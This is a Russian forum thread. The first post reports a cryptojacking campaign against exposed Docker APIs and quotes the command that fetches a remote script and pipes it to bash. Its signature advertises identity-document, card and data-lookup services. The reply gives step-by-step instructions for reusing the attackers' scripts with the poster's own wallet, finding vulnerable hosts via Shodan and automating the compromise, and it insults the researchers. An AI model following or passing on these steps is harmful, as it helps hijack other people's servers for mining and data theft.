Объявление

Свернуть
Пока нет объявлений.

Преступники майнят Monero на уязвимых Docker-системах

Свернуть
X
 
  • Фильтр
  • Время
  • Показать
Очистить всё
новые сообщения

  • Преступники майнят Monero на уязвимых Docker-системах

    Некая киберпреступная группировка проводит массовое сканирование интернета на предмета Docker-систем с доступными в Сети API. Злоумышленники отправляют команды Docker-системам и размещают майнеры криптовалюты Monero. Вредоносная кампания началась 24 ноября и сразу же стала заметной из-за своего масштаба.

    «Пользователи могут заметить, что подобные атаки на открытые Docker-системы не являются чем-то новым и происходят довольно часто. Отличительной чертой данной кампании был большой рост активности сканирования», — сообщил соучредитель компании Bad Packets Трой Марш (Troy Mursch).

    По словам исследователей из Bad Packets, группа, осуществляющая данные атаки, в настоящее время сканирует более 59 тыс. IP-сетей (сетевых блоков) в поисках открытых Docker-систем. После обнаружения уязвимого хоста, злоумышленники используют API для запуска контейнера ОС Alpine Linux, где они запускают команду chroot/mnt/bin/sh -c'curl-sL4 http:// ix.io / 1XQa | bash. Она загружает и запускает скрипт Bash с сервера злоумышленников, который устанавливает классический майнер криптовалюты XMRRig. По словам Марша, за два дня с момента начала кампании преступники уже добыли 14,82 Monero (XMR) на общую сумму чуть более $740.

    Эксперты также обнаружили, что преступники не только отключают защитные решения, но завершают все процессы, связанные с конкурирующими майнерами криптовалюты, такими как DDG. Как отмечается, вредоносный скрипт также содержит функцию сканирования зараженного хоста на наличие файлов rConfig. При обнаружении данные файлы шифруются и отправляются на C&C-сервер злоумышленников. Преступники также создают бэкдор на взломанных контейнерах и оставляют SSH-ключи для более легкого доступа и удаленного контроля зараженных хостов.

    Эксперты рекомендуют пользователям Docker проверить, доступны ли в Сети их API, закрыть порты и удалить нераспознанные контейнеры.
    «KHAN Service» ИДЕНТИФИКАЦИЯ / КАРТЫ / ПРОБИВ / ДИЗАЙНЕРСКИЕ УСЛУГИ

  • #2
    Я фигею с этих безопасников. Взяли и опубликовали рабочий скрипт.
    Качаем сам скрипт http://ix.io/1XQa
    Регистрируемся в пуле https://hashvault.pro/
    Качаем второй скрипт http://ix.io/1XQf
    меняем данные на свой xmr кош и данные с лк пула. Заливаем на свой сервак.
    Меняем 39 строчку в первом скрипте, вставляя в неё ссылку на исправленный скрипт на своём серваке. И так же заливаем на свой сервак.
    Ищем даже по шодану уязвимые хосты по CVE-2019-5021 (версии 3.3-3.5 ещё не фикшены)
    По API запускаем ту же команду, только со ссылкой на свой сервер. Автоматизируем простеньким скриптом.
    Всё, профит. Даже используя инфраструктуру тех же пацанов.

    Вот он всё это выявил и опубликовал. Теперь количество уязвимых хостов увеличится в сотни раз. EБЛAH.
    Но он будет считаться бэтмэном, а пацаны, которые вти*** по чуть чуть использовали не занятые мощности, преступниками.

    Комментарий

    Обработка...
    X